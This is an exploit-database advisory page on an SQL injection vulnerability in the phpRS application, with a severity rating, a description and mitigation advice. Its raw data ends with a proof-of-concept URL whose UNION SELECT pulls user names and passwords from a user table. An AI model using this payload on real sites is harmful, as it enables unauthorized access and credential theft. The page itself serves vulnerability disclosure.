header-logo
Suggest Exploit
vendor:
phpRS
by:
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpRS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

SQL Injection Vulnerability in phpRS

The phpRS application is vulnerable to SQL injection due to the lack of proper input sanitization. An attacker can exploit this vulnerability by injecting malicious SQL code into user-supplied input, potentially compromising the application, accessing or modifying data, or exploiting vulnerabilities in the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Regularly updating the phpRS application to the latest version is also advised.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45467/info

phpRS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

http://www.example.com/model-kits.php?akce=model&nazev=zis-3-1942-divisional-gun&id=-32/**/union/**/select/**/1,concat%28user,0x3a,password%29,3,4,5/**/from/**/mac_user--